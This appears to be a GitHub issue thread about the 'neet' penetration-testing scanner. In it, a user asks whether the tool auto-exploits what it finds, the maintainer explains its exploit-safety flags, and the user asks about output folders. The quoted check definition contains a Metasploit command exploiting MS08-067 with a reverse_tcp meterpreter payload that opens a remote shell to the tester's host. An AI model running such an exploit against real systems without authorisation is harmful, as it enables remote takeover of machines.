JonnyHightower
commented
7 years ago Good questions. No, neet doesn't automatically exploit everything it finds vulnerable. It used to have automatic exploitation turned on years ago, and run neet with -x (or -X - I can't remember) to disable auto exploitation. At the moment it's permanently disabled. It used the exautosafe parameter to know if the exploit was safe for automatic exploitation. If set to 0, then it wouldn't exploit it even with auto-exploitation on. The exmanusafe is to mark whether an exploit is safe for manual exploitation. Some exploits knock machines over. In the neet shell you can use the "exploit" command which will offer you a choice of vulnerabilities you can exploit on the current host. If exmanusafe is 0 for a particular exploit, you won't be offered it. In that, case you'd use the "uexploit" (short for unsafe exploit) command to be offered the unsafe ones. I'll answer your other question shortly.
aldo1901
Greadsky
I know you are porting to msfconsole instead of msfcli. My question was regarding some of your checks. For example. I can see here that you are checking for MS08-067 but it seems you're also executing the exploit. Does Neet automatically exploit everything is finds vulnerable?
[CHECK] name MS08-067 Server label [GSM-WinVA-MS08-067] desc Windows Server Service Remote Path Canonicalization Stack Overflow type Windows enabled 1
msref MS08-067 cve CVE-2008-4250 bid 31876
check [BIN]/ms08-067_check.py -s -t HOST 2>/dev/null vuln VULNERABLE
notest XP|2003
notest XP
exarch 32-bit extype metasploit exmancmd exploit/windows/smb/ms08_067_netapi RHOST=HOST LHOST=[LOCAL] TARGET=0 LPORT=[LOCALPORT] PAYLOA D=windows/patchupmeterpreter/reverse_tcp E
exautosafe 0 exmanusafe 0
Also, Can I change where the information gets outputted? As in instead of having the folder where I ran Neet from full of folders containing a specific scan, could I just tell it to create a directory and dump the results of a specific scan into that folder. This will be easer for organizational purposes.
Thank You